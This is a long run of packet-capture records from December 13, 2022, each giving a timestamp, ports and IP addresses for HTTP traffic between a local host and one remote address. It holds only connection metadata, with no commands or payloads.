                                              Dec 13, 2022 20:09:14.091100931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.091238976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.091264009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.091280937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.091411114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.091434002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.091588974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.091655016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.091732979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.091759920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.091764927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.091847897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.091938972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.091963053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.092087984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.092123032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.092257977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.095890999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.096309900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.096482038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.096682072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.096951962 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.097389936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.097527981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.097711086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.097914934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.098025084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.098223925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.098359108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.100583076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.101011038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.101171017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.101280928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.101391077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.101521969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.101650953 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.101843119 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.101988077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.102096081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.102221012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.102349997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.102478027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.102605104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.102720976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.102854013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.102972984 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.103101969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.103256941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.103431940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.103631973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.103802919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.103930950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.104049921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.104162931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.104274988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.104403973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.104533911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.104660034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.104777098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.104887009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.104999065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.105134010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.105257988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.105381966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.105511904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.105633020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.105745077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.106012106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.106134892 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.106153011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.106281042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.106414080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.106523991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.106637955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.106767893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.106910944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.107038975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.107165098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.107280016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.110785007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.111011982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.111145973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.111291885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.111397982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.111509085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.111639977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.111763000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.111881018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.112003088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.112128019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.112245083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.112366915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.112502098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.112628937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.112705946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.112770081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.112822056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.112896919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.112963915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.113023996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.113149881 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.113282919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.113420963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.113542080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.113662004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.113773108 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.113900900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.114037037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.114157915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.114294052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.114423990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.114554882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.114685059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.114918947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.114949942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.115076065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.115207911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.115334034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.115463018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.115577936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.115700006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.115828037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.115958929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.116079092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.116215944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.116465092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.116601944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.116718054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.116838932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.116966963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.117086887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.117225885 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.117356062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.117484093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.117609024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.121483088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.121609926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.121728897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.121848106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.121973991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.122107983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.122232914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.124897003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.124910116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.125040054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.125159025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.125170946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.125246048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.125284910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.125328064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.125416040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.125417948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.125518084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.125590086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.125646114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.125771999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.125782967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.125901937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.126023054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.126029968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.126137972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.126180887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.126249075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.126341105 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.126378059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.126406908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.126508951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.126575947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.126641035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.126765966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.126866102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.126897097 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.126913071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.127001047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.127059937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.127123117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.127245903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.127355099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.127399921 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.127414942 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.127429962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.127469063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.127598047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.127722979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.127851963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.127969027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.128078938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.128197908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.128328085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.128458023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.128526926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.128545046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.128559113 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.128591061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.128659010 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.128714085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.128819942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.128878117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.128894091 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.128930092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.128973007 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.129055977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.129097939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.129185915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.129210949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.129297972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.129314899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.129439116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.129456997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.129551888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.129662991 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.129664898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.129695892 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.129781008 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.129781961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.129909992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.130043983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.130179882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.130311012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.130399942 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.130419016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.130434990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.130541086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.130542994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.130582094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.130651951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.130656004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.130821943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.130837917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.130948067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.130970955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.131220102 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.131380081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.131618023 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.133882999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.134167910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.134298086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.134413004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.134526014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.134637117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.134754896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.134973049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.135001898 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.135128975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.135236979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.135354996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.135471106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.135590076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.135698080 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.135704994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.135719061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.135783911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.135884047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.135977983 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.136007071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.136169910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.136303902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.136420012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.136429071 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.136554003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.136579990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.136660099 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.136683941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.136703014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.136718988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.136816025 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.136888981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.136930943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.137020111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.137063026 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.137151957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.137195110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.137281895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.137397051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.137511969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.137584925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.137617111 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.137665987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.137691021 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.137803078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.137923956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.137989044 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.138016939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.138078928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.138201952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.138329029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.138423920 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.138457060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.138638973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.138770103 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.138902903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.138953924 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139046907 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.139090061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139133930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139152050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139166117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139180899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139244080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.139297009 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139379025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.139435053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139498949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139508009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.139625072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139667034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139677048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.139784098 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139816046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.139839888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.140022039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.140047073 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.140062094 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.140191078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.140311956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.140429974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.140446901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.140456915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.140525103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.140650034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.140671015 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.140783072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.140783072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.140921116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.140943050 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.141056061 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.141066074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.141196012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.141869068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.141906977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.141928911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.143846035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.144021988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.144140959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.144275904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.144407034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.144540071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.144673109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.144872904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.144876003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.144912958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.145035028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.145051956 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.145066977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.145148039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.145160913 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.145258904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.145288944 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.145323038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.145447016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.145569086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.145682096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.145823956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.145948887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.146002054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.146073103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.146096945 CET4973680192.168.2.362.204.41.79
